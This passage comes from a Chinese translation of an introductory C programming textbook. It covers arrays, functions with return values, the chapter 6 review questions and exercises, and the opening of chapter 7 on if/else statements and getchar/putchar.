不同的字符。然而,测试条件并没有改变,所以每行依然是以F结尾,这使 得每一行打印的字符都比上一行少一个。 376 6.11 数组简介 在许多程序中,数组很重要。数组可以作为一种储存多个相关项的便利 方式。我们在第10章中将详细介绍数组,但是由于循环经常用到数组,所以 在这里先简要地介绍一下。 数组(array)是按顺序储存的一系列类型相同的值,如10个char类型的 字符或15个int类型的值。整个数组有一个数组名,通过整数下标访问数组中 单独的项或元素(element)。例如,以下声明: float debts[20]; 声明debts是一个内含20个元素的数组,每个元素都可以储存float类型的 值。数组的第1个元素是debts[0],第2个元素是debts[1],以此类推,直到 debts[19]。注意,数组元素的编号从0开始,不是从1开始。可以给每个元素 赋float类型的值。例如,可以这样写: debts[5] = 32.54; debts[6] = 1.2e+21; 实际上,使用数组元素和使用同类型的变量一样。例如,可以这样把值 读入指定的元素中: scanf("%f", &debts[4]); // 把一个值读入数组的第5个元素 这里要注意一个潜在的陷阱:考虑到影响执行的速度,C 编译器不会检 查数组的下标是否正确。下面的代码,都不正确: debts[20] = 88.32;   // 该数组元素不存在 debts[33] = 828.12;  // 该数组元素不存在 编译器不会查找这样的错误。当运行程序时,这会导致数据被放置在已 377 被其他数据占用的地方,可能会破坏程序的结果甚至导致程序异常中断。 数组的类型可以是任意数据类型。 int nannies[22]; /* 可储存22个int类型整数的数组 */ char actors[26]; /* 可储存26个字符的数组 */ long big[500];  /* 可储存500个long类型整数的数组 */ 我们在第4章中讨论过字符串,可以把字符串储存在char类型的数组中 
(一般而言,char类型数组的所有元素都储存char类型的值)。如果char类 型的数组末尾包含一个表示字符串末尾的空字符\0,则该数组中的内容就构 成了一个字符串(见图6.6)。 图6.6 字符数组和字符串 用于识别数组元素的数字被称为下标(subscript)、索引(indice)或 偏移量(offset)。下标必须是整数,而且要从0开始计数。数组的元素被依 次储存在内存中相邻的位置,如图6.7所示。 378 图6.7 内存中的char和int类型的数组 6.11.1 在for循环中使用数组 程序中有许多地方要用到数组,程序清单6.19是一个较为简单的例子。 该程序读取10个高尔夫分数,稍后进行处理。使用数组,就不用创建10个不 同的变量来储存10个高尔夫分数。而且,还可以用for循环来读取数据。程 序打印总分、平均分、差点(handicap,它是平均分与标准分的差值)。 程序清单6.19 scores_in.c程序 // scores_in.c -- 使用循环处理数组 #include <stdio.h> #define SIZE 10 #define PAR 72 int main(void) { int index, score[SIZE]; 379 int sum = 0; float average; printf("Enter %d golf scores:\n", SIZE); for (index = 0; index < SIZE; index++) scanf("%d", &score[index]);   // 读取10个分数 printf("The scores read in are as follows:\n"); for (index = 0; index < SIZE; index++) printf("%5d", score[index]);  // 验证输入 printf("\n"); for (index = 0; index < SIZE; index++) sum += score[index];       // 求总分数 average = (float) sum / SIZE;    // 求平均分 printf("Sum of scores = %d, average = %.2f\n", sum,  average); printf("That's a handicap of %.0f.\n", average - PAR); return 0; } 先看看程序清单6.19是否能正常工作,接下来再做一些解释。下面是程 序的输出: Enter 10 golf scores: 380 99 95 109 105 100 96 98 93 99 97 98 The scores read in are as follows: 99 95 109 105 100 96 98 93 99 97 Sum of scores = 991, average = 99.10 That's a handicap of 27. 程序运行没问题,我们来仔细分析一下。首先,注意程序示例虽然打印 了11个数字,但是只读入了10个数字,因为循环只读了10个值。由于scanf() 会跳过空白字符,所以可以在一行输入10个数字,也可以每行只输入一个数 字,或者像本例这样混合使用空格和换行符隔开每个数字(因为输入是缓冲 的,只有当用户键入Enter键后数字才会被发送给程序)。 然后,程序使用数组和循环处理数据,这比使用10个单独的scanf()语句 和10个单独的printf()语句读取10个分数方便得多。for循环提供了一个简单直 接的方法来使用数组下标。注意,int类型数组元素的用法与int类型变量的用 法类似。要读取int类型变量fue,应这样写 。程序 清单6.19中要读取int类型的元素 ,所以这样写 。 该程序示例演示了一些较好的编程风格。第一,用#define 指令创建的 明示常量(SIZE)来指定数组的大小。这样就可以在定义数组和设置循环边 界时使用该明示常量。如果以后要扩展程序处理20个分数,只需简单地把 SIZE重新定义为20即可,不用逐一修改程序中使用了数组大小的每一处。 第二,下面的代码可以很方便地处理一个大小为SIZE的数组: for (index = 0; index < SIZE; index++) 381 设置正确的数组边界很重要。第1个元素的下标是0,因此循环开始时把 index设置为0。因为从0开始编号,所以数组中最后一个元素的下标是SIZE - 1。也就是说,第10个元素是score[9]。通过测试条件index < SIZE来控制循 环中使用的最后一个index的值是SIZE - 1。 第三,程序能重复显示刚读入的数据。这是很好的编程习惯,有助于确 保程序处理的数据与期望相符。 最后,注意该程序使用了3个独立的for循环。这是否必要?是否可以将 其合并成一个循环?当然可以,读者可以动手试试,合并后的程序显得更加 紧凑。但是,调整时要注意遵循模块化(modularity)的原则。模块化隐含 的思想是:应该把程序划分为一些独立的单元,每个单元执行一个任务。这 样做提高了程序的可读性。也许更重要的是,模块化使程序的不同部分彼此 独立,方便后续更新或修改程序。在掌握如何使用函数后,可以把每个执行 任务的单元放进函数中,提高程序的模块化。 382 6.12 使用函数返回值的循环示例 本章最后一个程序示例要用一个函数计算数的整数次幂(math.h库提供 了一个更强大幂函数pow(),可以使用浮点指数)。该示例有3个主要任务: 设计算法、在函数中表示算法并返回计算结果、提供一个测试函数的便利方 法。 首先分析算法。为简化函数,我们规定该函数只处理正整数的幂。这 样,把n与n相乘p次便可计算n的p次幂。这里自然会用到循环。先把变量 pow设置为1,然后将其反复乘以n: for(i = 1; i <= p; i++) pow *= n; 回忆一下,*=运算符把左侧的项乘以右侧的项,再把乘积赋给左侧的 项。第1次循环后,pow的值是1乘以n,即n;第2次循环后,pow的值是上一 次的值(n)乘以n,即n的平方;以此类推。这种情况使用for循环很合适, 因为在执行循环之前已预先知道了迭代的次数(已知p)。 现在算法已确定,接下来要决定使用何种数据类型。指数p是整数,其 类型应该是int。为了扩大n及其幂的范围,n和pow的类型都是double。 接下来,考虑如何把以上内容用函数来实现。要使用两个参数(分别是 double类型和int类型)才能把所需的信息传递给函数,并指定求哪个数的多 少次幂。而且,函数要返回一个值。如何把函数的返回值返回给主调函数? 
编写一个有返回值的函数,要完成以下内容: 1.定义函数时,确定函数的返回类型; 2.使用关键字return表明待返回的值。 例如,可以这样写: 383 double power(double n, int p) // 返回一个double类型的值 { double pow = 1; int i; for (i = 1; i <= p; i++) pow *= n; return pow; // 返回pow的值 } 要声明函数的返回类型,在函数名前写出类型即可,就像声明一个变量 那样。关键字 return 表明该函数将把它后面的值返回给主调函数。根据上面 的代码,函数返回一个变量的值。返回值也可以是表达式的值,如下所示: return 2 * x + b; 函数将计算表达式的值,并返回该值。在主调函数中,可以把返回值赋 给另一个变量、作为表达式中的值、作为另一个函数的参数(如, ),或者忽略它。 现在,我们在一个程序中使用这个函数。要测试一个函数很简单,只需 给它提供几个值,看它是如何响应的。这种情况下可以创建一个输入循环, 选择 while 循环很合适。可以使用 scanf()函数一次读取两个值。如果成功读 取两个值,scanf()则返回2,所以可以把scanf()的返回值与2作比较来控制循 环。还要注意,必须先声明power()函数(即写出函数原型)才能在程序中 使用它,就像先声明变量再使用一样。程序清单6.20演示了这个程序。 程序清单6.20 powwer.c程序 384 // power.c -- 计算数的整数幂 #include <stdio.h> double power(double n, int p); // ANSI函数原型 int main(void) { double x, xpow; int exp; printf("Enter a number and the positive integer power"); printf(" to which\nthe number will be raised. Enter q"); printf(" to quit.\n"); while (scanf("%lf%d", &x, &exp) == 2) { xpow = power(x, exp); // 函数调用 printf("%.3g to the power %d is %.5g\n", x, exp, xpow); printf("Enter next pair of numbers or q to quit.\n"); } printf("Hope you enjoyed this power trip -- bye!\n"); return 0; } 385 double power(double n, int p)  // 函数定义 { double pow = 1; int i; for (i = 1; i <= p; i++) pow *= n; return pow;          // 返回pow的值 } 运行该程序后,输出示例如下: Enter a number and the positive integer power to which the number will be raised. Enter q to quit. 1.2 12 1.2 to the power 12 is 8.9161 Enter next pair of numbers or q to quit. 2 16 2 to the power 16 is 65536 Enter next pair of numbers or q to quit. q 386 Hope you enjoyed this power trip -- bye! 6.12.1 程序分析 该程序示例中的main()是一个驱动程序(driver),即被设计用来测试 函数的小程序。 该例的while循环是前面讨论过的一般形式。输入1.2 12,scanf()成功读 取两值,并返回2,循环继续。因为scanf()跳过空白,所以可以像输出示例 那样,分多行输入。但是输入q会使scanf()的返回值为0,因为q与scanf()中的 转换说明%1f不匹配。scanf()将返回0,循环结束。类似地,输入2.8 q会使 scanf()的返回值为1,循环也会结束。 现在分析一下与函数相关的内容。powwer()函数在程序中出现了3次。 首次出现是: double power(double n, int p); // ANSI函数原型 这是power()函数的原型,它声明程序将使用一个名为power()的函数。 开头的关键字double表明power()函数返回一个double类型的值。编译器要知 道power()函数返回值的类型,才能知道有多少字节的数据,以及如何解释 它们。这就是为什么必须声明函数的原因。圆括号中的 double n, int p表示 power()函数的两个参数。第1个参数应该是double类型的值,第2个参数应该 是int类型的值。 第2次出现是: xpow = power(x,exp); // 函数调用 程序调用power(),把两个值传递给它。该函数计算x的exp次幂,并把 计算结果返回给主调函数。在主调函数中,返回值将被赋给变量xpow。 第3次出现是: 387 double power(double n, int p) // 函数定义 这里,power()有两个形参,一个是double类型,一个是int类型,分别由 变量n和变量p表示。注意,函数定义的末尾没有分号,而函数原型的末尾有 分号。在函数头后面花括号中的内容,就是power()完成任务的代码。 power()函数用for循环计算n的p次幂,并把计算结果赋给pow,然后返 回pow的值,如下所示: return pow; //返回pow的值 6.12.2 使用带返回值的函数 声明函数、调用函数、定义函数、使用关键字return,都是定义和使用 带返回值函数的基本要素。 这里,读者可能有一些问题。例如,既然在使用函数返回值之前要声明 函数,那么为什么在使用scanf()的返回值之前没有声明scanf()?为什么在定 义中说明了power()的返回类型为double,还要单独声明这个函数? 
我们先回答第2 个问题。编译器在程序中首次遇到power()时,需要知道 power()的返回类型。此时,编译器尚未执行到power()的定义,并不知道函 数定义中的返回类型是double。因此,必须通过前置声明(forward declaration)预先说明函数的返回类型。前置声明告诉编译器,power()定义 在别处,其返回类型为double。如果把power()函数的定义置于main()的文件 顶部,就可以省略前置声明,因为编译器在执行到main()之前已经知道 power()的所有信息。但是,这不是C的标准风格。因为main()通常只提供整 个程序的框架,最好把 main()放在所有函数定义的前面。另外,通常把函数 放在其他文件中,所以前置声明必不可少。 接下来,为什么不用声明 scanf()函数就可以使用它?其实,你已经声明 了。stdio.h 头文件中包含了scanf()、printf()和其他I/O函数的原型。scanf()函 数的原型表明,它返回的类型是int。 388 6.13 关键概念 循环是一个强大的编程工具。在创建循环时,要特别注意以下3个方 面: 注意循环的测试条件要能使循环结束; 确保循环测试中的值在首次使用之前已初始化; 确保循环在每次迭代都更新测试的值。 C通过求值来处理测试条件,结果为0表示假,非0表示真。带关系运算 符的表达式常用于循环测试,它们有些特殊。如果关系表达式为真,其值为 1;如果为假,其值为0。这与新类型_Bool的值保持一致。 数组由相邻的内存位置组成,只储存相同类型的数据。记住,数组元素 的编号从 0 开始,所有数组最后一个元素的下标一定比元素数目少1。C编 译器不会检查数组下标值是否有效,自己要多留心。 使用函数涉及3个步骤: 通过函数原型声明函数; 在程序中通过函数调用使用函数; 定义函数。 函数原型是为了方便编译器查看程序中使用的函数是否正确,函数定义 描述了函数如何工作。现代的编程习惯是把程序要素分为接口部分和实现部 分,例如函数原型和函数定义。接口部分描述了如何使用一个特性,也就是 函数原型所做的;实现部分描述了具体的行为,这正是函数定义所做的。 389 6.14 本章小结 本章的主题是程序控制。C语言为实现结构化的程序提供了许多工具。 while语句和for语句提供了入口条件循环。for语句特别适用于需要初始化和 更新的循环。使用逗号运算符可以在for循环中初始化和更新多个变量。有 些场合也需要使用出口条件循环,C为此提供了do while语句。 典型的while循环设计的伪代码如下: 获得初值 while (值满足测试条件) { 处理该值 获取下一个值 } for循环也可以完成相同的任务: for (获得初值; 值满足测试条件; 获得下一个值) 处理该值 这些循环都使用测试条件来判断是否继续执行下一次迭代。一般而言, 如果对测试表达式求值为非0,则继续执行循环;否则,结束循环。通常, 测试条件都是关系表达式(由关系运算符和表达式构成)。表达式的关系为 真,则表达式的值为1;如果关系为假,则表达式的值为0。C99新增了 _Bool类型,该类型的变量只能储存1或0,分别表示真或假。 除了关系运算符,本章还介绍了其他的组合赋值运算符,如+=或*=。 这些运算符通过对其左侧运算对象执行算术运算来修改它的值。 390 接下来还简单地介绍了数组。声明数组时,方括号中的值指明了该数组 的元素个数。数组的第 1 个元素编号为0,第2个元素编号为1,以此类推。 例如,以下声明: double hippos[20]; 创建了一个有20个元素的数组hippos,其元素从hippos[0]~hippos[19]。 利用循环可以很方便地操控数组的下标。 最后,本章演示了如何编写和使用带返回值的函数。 391 6.15 复习题 复习题的参考答案在附录A中。 1.写出执行完下列各行后quack的值是多少。后5行中使用的是第1行 quack的值。 int quack = 2; quack += 5; quack *= 10; quack -= 6; quack /= 8; quack %= 3; 2.假设value是int类型,下面循环的输出是什么? for ( value = 36; value > 0; value /= 2) printf("%3d", value); 如果value是double类型,会出现什么问题? 3.用代码表示以下测试条件: a.大于5 b. 读取一个名为 的 类型值且失败 c.X的值等于 4.用代码表示以下测试条件: 392 a. 成功读入一个整数 b. 不等于 c. 大于或等于 5.下面的程序有点问题,请找出问题所在。 #include <stdio.h> int main(void) {                  /* 第3行 */ int i, j, list(10);       /* 第4行 */ for (i = 1, i <= 10, i++)    /* 第6行 */ {                /* 第7行 */ list[i] = 2*i + 3;      /* 第8行 */ for (j = 1, j > = i, j++)  /* 第9行 */ printf(" %d", list[j]); /* 第10行 */ printf("\n");        /* 第11行 */ }                  /* 第12行 */ 6.编写一个程序打印下面的图案,要求使用嵌套循环: $$$$$$$$ $$$$$$$$ $$$$$$$$ 393 $$$$$$$$ 7.下面的程序各打印什么内容? a. #include <stdio.h> int main(void) { int i = 0; while (++i < 4) printf("Hi! "); do printf("Bye! "); while (i++ < 8); return 0; } b. #include <stdio.h> int main(void) { int i; 394 char ch; for (i = 0, ch = 'A'; i < 4; i++, ch += 2 * i) printf("%c", ch); return 0; } 8.假设用户输入的是 ,下面各程序的输出是什 么?(在ASCII码中,!紧跟在空格字符后面) a. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); while (ch != 'g') { printf("%c", ch); scanf("%c", &ch); } return 0; 395 } b. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); while (ch != 'g') { printf("%c", ++ch); scanf("%c", &ch); } return 0; } c. #include <stdio.h> int main(void) { char ch; 396 do { scanf("%c", &ch); printf("%c", ch); } while (ch != 'g'); return 0; } d. #include <stdio.h> int main(void) { char ch; scanf("%c", &ch); for (ch = '$'; ch != 'g'; scanf("%c", &ch)) printf("%c", ch); return 0; } 9.下面的程序打印什么内容? 
#include <stdio.h> int main(void) 397 { int n, m; n = 30; while (++n <= 33) printf("%d|", n); n = 30; do printf("%d|", n); while (++n <= 33); printf("\n***\n"); for (n = 1; n*n < 200; n += 4) printf("%d\n", n); printf("\n***\n"); for (n = 2, m = 6; n < m; n *= 2, m += 2) printf("%d %d\n", n, m); printf("\n***\n"); for (n = 5; n > 0; n--) { for (m = 0; m <= n; m++) 398 printf("="); printf("\n"); } return 0; } 10.考虑下面的声明: double mint[10]; a.数组名是什么? b.该数组有多少个元素? c.每个元素可以储存什么类型的值? d.下面的哪一个scanf()的用法正确? i.scanf("%lf", mint[2]) ii.scanf("%lf", &mint[2]) iii.scanf("%lf", &mint) 11.Noah先生喜欢以2计数,所以编写了下面的程序,创建了一个储存 2、4、6、8等数字的数组。 这个程序是否有错误之处?如果有,请指出。 #include <stdio.h> #define SIZE 8 399 int main(void) { int by_twos[SIZE]; int index; for (index = 1; index <= SIZE; index++) by_twos[index] = 2 * index; for (index = 1; index <= SIZE; index++) printf("%d ", by_twos); printf("\n"); return 0; } 12.假设要编写一个返回long类型值的函数,函数定义中应包含什么? 13.定义一个函数,接受一个int类型的参数,并以long类型返回参数的平 方值。 14.下面的程序打印什么内容? #include <stdio.h> int main(void) { int k; 400 for (k = 1, printf("%d: Hi!\n", k); printf("k = %d\n", k), k*k < 26; k += 2, printf("Now k is %d\n", k)) printf("k is %d in the loop\n", k); return 0; } 401 6.16 编程练习 1.编写一个程序,创建一个包含26个元素的数组,并在其中储存26个小 写字母。然后打印数组的所有内容。 2.使用嵌套循环,按下面的格式打印字符: $ $$ $$$ $$$$ $$$$$ 3.使用嵌套循环,按下面的格式打印字母: F FE FED FEDC FEDCB FEDCBA 注意:如果你的系统不使用ASCII或其他以数字顺序编码的代码,可以 把字符数组初始化为字母表中的字母: char lets[27] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 402 然后用数组下标选择单独的字母,例如lets[0]是‘A’,等等。 4.使用嵌套循环,按下面的格式打印字母: A BC DEF GHIJ KLMNO PQRSTU 如果你的系统不使用以数字顺序编码的代码,请参照练习3的方案解 决。 5.编写一个程序,提示用户输入大写字母。使用嵌套循环以下面金字塔 型的格式打印字母: A ABA ABCBA ABCDCBA ABCDEDCBA 打印这样的图形,要根据用户输入的字母来决定。例如,上面的图形是 在用户输入E后的打印结果。 提示:用外层循环处理行,每行使用3个内层循环,分别处理空格、以 403 升序打印字母、以降序打印字母。如果系统不使用ASCII或其他以数字顺序 编码的代码,请参照练习3的解决方案。 6.编写一个程序打印一个表格,每一行打印一个整数、该数的平方、该 数的立方。要求用户输入表格的上下限。使用一个for循环。 7.编写一个程序把一个单词读入一个字符数组中,然后倒序打印这个单 词。提示:strlen()函数(第4章介绍过)可用于计算数组最后一个字符的下 标。 8.编写一个程序,要求用户输入两个浮点数,并打印两数之差除以两数 乘积的结果。在用户输入非数字之前,程序应循环处理用户输入的每对值。 9.修改练习8,使用一个函数返回计算的结果。 10.编写一个程序,要求用户输入一个上限整数和一个下限整数,计算 从上限到下限范围内所有整数的平方和,并显示计算结果。然后程序继续提 示用户输入上限和下限整数,并显示结果,直到用户输入的上限整数小于下 限整数为止。程序的运行示例如下: Enter lower and upper integer limits: 5 9 The sums of the squares from 25 to 81 is 255 Enter next set of limits: 3 25 The sums of the squares from 9 to 625 is 5520 Enter next set of limits: 5 5 Done 11.编写一个程序,在数组中读入8个整数,然后按倒序打印这8个整 数。 404 12.考虑下面两个无限序列: 1.0 + 1.0/2.0 + 1.0/3.0 + 1.0/4.0 + ... 1.0 - 1.0/2.0 + 1.0/3.0 - 1.0/4.0 + ... 编写一个程序计算这两个无限序列的总和,直到到达某次数。提示:奇 数个-1 相乘得-1,偶数个-1相乘得1。让用户交互地输入指定的次数,当用 户输入0或负值时结束输入。查看运行100项、1000项、10000项后的总和, 是否发现每个序列都收敛于某值? 13.编写一个程序,创建一个包含8个元素的int类型数组,分别把数组元 素设置为2的前8次幂。使用for循环设置数组元素的值,使用do while循环显 示数组元素的值。 14.编写一个程序,创建两个包含8个元素的double类型数组,使用循环 提示用户为第一个数组输入8 个值。第二个数组元素的值设置为第一个数组 对应元素的累积之和。例如,第二个数组的第 4个元素的值是第一个数组前 4个元素之和,第二个数组的第5个元素的值是第一个数组前5个元素之和 (用嵌套循环可以完成,但是利用第二个数组的第5个元素是第二个数组的 第4个元素与第一个数组的第5个元素之和,只用一个循环就能完成任务,不 需要使用嵌套循环)。最后,使用循环显示两个数组的内容,第一个数组显 示成一行,第二个数组显示在第一个数组的下一行,而且每个元素都与第一 个数组各元素相对应。 15.编写一个程序,读取一行输入,然后把输入的内容倒序打印出来。 可以把输入储存在char类型的数组中,假设每行字符不超过255。回忆一 下,根据%c转换说明,scanf()函数一次只能从输入中读取一个字符,而且 在用户按下Enter键时scanf()函数会生成一个换行字符(\n)。 16.Daphne以10%的单利息投资了100美元(也就是说,每年投资获利相 当于原始投资的10%)。Deirdre以 5%的复合利息投资了 100 美元(也就是 说,利息是当前余额的 5%,包含之前的利息)。编写一个程序,计算需要 405 多少年Deirdre的投资额才会超过Daphne,并显示那时两人的投资额。 17.Chuckie Lucky赢得了100万美元(税后),他把奖金存入年利率8%的 账户。在每年的最后一天, Chuckie取出10万美元。编写一个程序,计算多 少年后Chuckie会取完账户的钱? 
18.Rabnud博士加入了一个社交圈。起初他有5个朋友。他注意到他的朋 友数量以下面的方式增长。第1周少了1个朋友,剩下的朋友数量翻倍;第2 周少了2个朋友,剩下的朋友数量翻倍。一般而言,第N周少了N个朋友,剩 下的朋友数量翻倍。编写一个程序,计算并显示Rabnud博士每周的朋友数 量。该程序一直运行,直到超过邓巴数(Dunbar’s number)。邓巴数是粗略 估算一个人在社交圈中有稳定关系的成员的最大值,该值大约是150。 [1].其实num的最终值不是6,而是7。虽然最后一次循环打印的num值是6, 但随后num++使num的值为7,然后num<= 6为假,for循环结束。——译者注 406 第7章 C控制语句:分支和跳转 本章介绍以下内容: 关键字:if、else、switch、continue、break、case、default、goto 运算符:&&、||、?: 函数:getchar()、putchar()、ctype.h系列 如何使用if和if else语句,如何嵌套它们 在更复杂的测试表达式中用逻辑运算符组合关系表达式 C的条件运算符 switch语句 break、continue和goto语句 使用C的字符I/O函数:getchar()和putchar() ctype.h头文件提供的字符分析函数系列 随着越来越熟悉C,可以尝试用C程序解决一些更复杂的问题。这时 候,需要一些方法来控制和组织程序,为此C提供了一些工具。前面已经学 过如何在程序中用循环重复执行任务。本章将介绍分支结构(如, if和 switch),让程序根据测试条件执行相应的行为。另外,还将介绍C语言的 逻辑运算符,使用逻辑运算符能在 while 或 if 的条件中测试更多关系。此 外,本章还将介绍跳转语句,它将程序流转换到程序的其他部分。学完本章 后,读者就可以设计按自己期望方式运行的程序。 407 7.1 if语句 我们从一个有if语句的简单示例开始学习,请看程序清单7.1。该程序读 取一列数据,每个数据都表示每日的最低温度(℃),然后打印统计的总天 数和最低温度在0℃以下的天数占总天数的百分比。程序中的循环通过 scanf()读入温度值。while循环每迭代一次,就递增计数器增加天数,其中的 if语句负责判断0℃以下的温度并单独统计相应的天数。 程序清单7.1 colddays.c程序 // colddays.c -- 找出0℃以下的天数占总天数的百分比 #include <stdio.h> int main(void) { const int FREEZING = 0; float temperature; int cold_days = 0; int all_days = 0; printf("Enter the list of daily low temperatures.\n"); printf("Use Celsius, and enter q to quit.\n"); while (scanf("%f", &temperature) == 1) { all_days++; 408 if (temperature < FREEZING) cold_days++; } if (all_days != 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); if (all_days == 0) printf("No data entered!\n"); return 0; } 下面是该程序的输出示例: Enter the list of daily low temperatures. Use Celsius, and enter q to quit. 12 5 -2.5 0 6 8 -3 -10 5 10 q 10 days total: 30.0% were below freezing. while循环的测试条件利用scanf()的返回值来结束循环,因为scanf()在读 到非数字字符时会返回0。temperature的类型是float而不是int,这样程序既可 以接受-2.5这样的值,也可以接受8这样的值。 while循环中的新语句如下: if (temperature < FREEZING) 409 cold_days++; if 语句指示计算机,如果刚读取的值(remperature)小于 0,就把 cold_days 递增 1;如果temperature不小于0,就跳过cold_days++;语句,while 循环继续读取下一个温度值。 接着,该程序又使用了两次if语句控制程序的输出。如果有数据,就打 印结果;如果没有数据,就打印一条消息(稍后将介绍一种更好的方法来处 理这种情况)。 为避免整数除法,该程序示例把计算后的百分比强制转换为 float类 型。其实,也不必使用强制类型转换,因为在表达式100.0 * cold_days / all_days中,将首先对表达式100.0 * cold_days求值,由于C的自动转换类型 规则,乘积会被强制转换成浮点数。但是,使用强制类型转换可以明确表达 转换类型的意图,保护程序免受不同版本编译器的影响。if语句被称为分支 语句(branching statement)或选择语句(selection statement),因为它相当 于一个交叉点,程序要在两条分支中选择一条执行。if语句的通用形式如 下: if ( expression ) statement 如果对expression求值为真(非0),则执行statement;否则,跳过 statement。与while循环一样,statement可以是一条简单语句或复合语句。if 语句的结构和while语句很相似,它们的主要区别是:如果满足条件可执行 的话,if语句只能测试和执行一次,而while语句可以测试和执行多次。 通常,expression 是关系表达式,即比较两个量的大小(如,表达式 x > y 或 c == 6)。如果expression为真(即x大于y,或c == 6),则执行 statement。否则,忽略statement。概括地说,可以使用任意表达式,表达式 的值为0则为假。 410 statement部分可以是一条简单语句,如本例所示,或者是一条用花括号 括起来的复合语句(或块): if (score > big) printf("Jackpot!\n"); // 简单语句 if (joe > ron) {              // 复合语句 joecash++; printf("You lose, Ron.\n"); } 注意,即使if语句由复合语句构成,整个if语句仍被视为一条语句。 411 7.2 if else语句 简单形式的if语句可以让程序选择执行一条语句,或者跳过这条语句。 C还提供了if else形式,可以在两条语句之间作选择。我们用if else形式修正 程序清单7.1中的程序段。 if (all_days != 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); if (all_days == 0) printf("No data entered!\n"); 如果程序发现all_days不等于0,那么它应该知道另一种情况一定是 all_days等于0。用if else形式只需测试一次。重写上面的程序段如下: if (all_days!= 0) printf("%d days total: %.1f%% were below freezing.\n", all_days, 100.0 * (float) cold_days / all_days); else printf("No data entered!\n"); 如果if语句的测试表达式为真,就打印温度数据;如果为假,就打印警 告消息。 注意,if else语句的通用形式是: if ( expression ) 412 statement1 else statement2 
如果expression为真(非0),则执行statement1;如果expression为假或 0,则执行else后面的statement2。statement1和statement2可以是一条简单语句 或复合语句。C并不要求一定要缩进,但这是标准风格。缩进让根据测试条 件的求值结果来判断执行哪部分语句一目了然。 如果要在if和else之间执行多条语句,必须用花括号把这些语句括起来 成为一个块。下面的代码结构违反了C语法,因为在if和else之间只允许有一 条语句(简单语句或复合语句): if (x > 0) printf("Incrementing x:\n"); x++; else   // 将产生一个错误 printf("x <= 0 \n"); 编译器把printf()语句视为if语句的一部分,而把x++;看作一条单独的语 句,它不是if语句的一部分。然后,编译器发现else并没有所属的if,这是错 误的。上面的代码应该这样写: if (x > 0) { printf("Incrementing x:\n"); x++; 413 } else printf("x <= 0 \n"); if语句用于选择是否执行一个行为,而else if语句用于在两个行为之间 选择。图7.1比较了这两种语句。 414 图7.1 if语句和if else语句 7.2.1 另一个示例:介绍getchar()和putchar() 到目前为止,学过的大多数程序示例都要求输入数值。接下来,我们看 看输入字符的示例。相信读者已经熟悉了如何用 scanf()和 printf()根据%c 转 换说明读写字符,我们马上要讲解的示例中要用到一对字符输入/输出函 数:getchar()和putchar()。 getchar()函数不带任何参数,它从输入队列中返回下一个字符。例如, 下面的语句读取下一个字符输入,并把该字符的值赋给变量ch: ch = getchar(); 该语句与下面的语句效果相同: scanf("%c", &ch); putchar()函数打印它的参数。例如,下面的语句把之前赋给ch的值作为 字符打印出来: putchar(ch); 该语句与下面的语句效果相同: printf("%c", ch); 由于这些函数只处理字符,所以它们比更通用的scanf()和printf()函数更 快、更简洁。而且,注意 getchar()和 putchar()不需要转换说明,因为它们只 处理字符。这两个函数通常定义在 stdio.h头文件中(而且,它们通常是预处 理宏,而不是真正的函数,第16章会讨论类似函数的宏)。 接下来,我们编写一个程序来说明这两个函数是如何工作的。该程序把 一行输入重新打印出来,但是每个非空格都被替换成原字符在ASCII序列中 的下一个字符,空格不变。这一过程可描述为“如果字符是空白,原样打 415 印;否则,打印原字符在ASCII序列中的下一个字符”。 C代码看上去和上面的描述很相似,请看程序清单7.2。 程序清单7.2 cypher1.c程序 // cypher1.c -- 更改输入,空格不变 #include <stdio.h> #define SPACE ' '        // SPACE表示单引号-空格-单引号 int main(void) { char ch; ch = getchar();       // 读取一个字符 while (ch != '\n')     // 当一行未结束时 { if (ch == SPACE)    // 留下空格 putchar(ch);    // 该字符不变 else putchar(ch + 1);  // 改变其他字符 ch = getchar();    // 获取下一个字符 } putchar(ch);        // 打印换行符 416 return 0; } (如果编译器警告因转换可能导致数据丢失,不用担心。第8章在讲到 EOF时再解释。) 下面是该程序的输入示例: CALL ME HAL. DBMM NF IBM/ 把程序清单7.1中的循环和该例中的循环作比较。前者使用scanf()返回的 状态值判断是否结束循环,而后者使用输入项的值来判断是否结束循环。这 使得两程序所用的循环结构略有不同:程序清单7.1中在循环前面有一条“读 取语句”,程序清单7.2中在每次迭代的末尾有一条“读取语句”。不过,C的 语法比较灵活,读者也可以模仿程序清单7.1,把读取和测试合并成一个表 达式。也就是说,可以把这种形式的循环: ch = getchar();    /* 读取一个字符 */ while (ch != '\n')  /* 当一行未结束时 */ { ...       /* 处理字符 */ ch = getchar();  /* 获取下一个字符 */ } 替换成下面形式的循环: while ((ch = getchar()) != '\n') 417 { ...       
/* 处理字符 */ } 关键的一行代码是: while ((ch = getchar()) != '\n') 这体现了C特有的编程风格——把两个行为合并成一个表达式。C对代 码的格式要求宽松,这样写让其中的每个行为更加清晰: while ( (ch = getchar())       // 给ch赋一个值 != '\n')  // 把ch和\n作比较 以上执行的行为是赋值给ch和把ch的值与换行符作比较。表达式ch = getchar()两侧的圆括号使之成为!=运算符的左侧运算对象。要对该表达式求 值,必须先调用getchar()函数,然后把该函数的返回值赋给 ch。因为赋值表 达式的值是赋值运算符左侧运算对象的值,所以 ch = getchar()的值就是 ch 的新值,因此,读取ch的值后,测试条件相当于是ch != '\n'(即,ch不是换 行符)。 这种独特的写法在C编程中很常见,应该多熟悉它。还要记住合理使用 圆括号组合子表达式。上面例子中的圆括号都必不可少。假设省略ch = getchar()两侧的圆括号: while (ch = getchar() != '\n') !=运算符的优先级比=高,所以先对表达式getchar() != '\n'求值。由于这 是关系表达式,所以其值不是1就是0(真或假)。然后,把该值赋给ch。省 略圆括号意味着赋给ch的值是0或1,而不是 getchar()的返回值。这不是我们 418 的初衷。 下面的语句: putchar(ch + 1); /* 改变其他字符 */ 再次演示了字符实际上是作为整数储存的。为方便计算,表达式ch + 1 中的ch被转换成int类型,然后int类型的计算结果被传递给接受一个int类型参 数的putchar(),该函数只根据最后一个字节确定显示哪个字符。 7.2.2 ctype.h系列的字符函数 注意到程序清单7.2的输出中,最后输入的点号(.)被转换成斜杠 (/),这是因为斜杠字符对应的ASCII码比点号的 ASCII 码多 1。如果程序 只转换字母,保留所有的非字母字符(不只是空格)会更好。本章稍后讨论 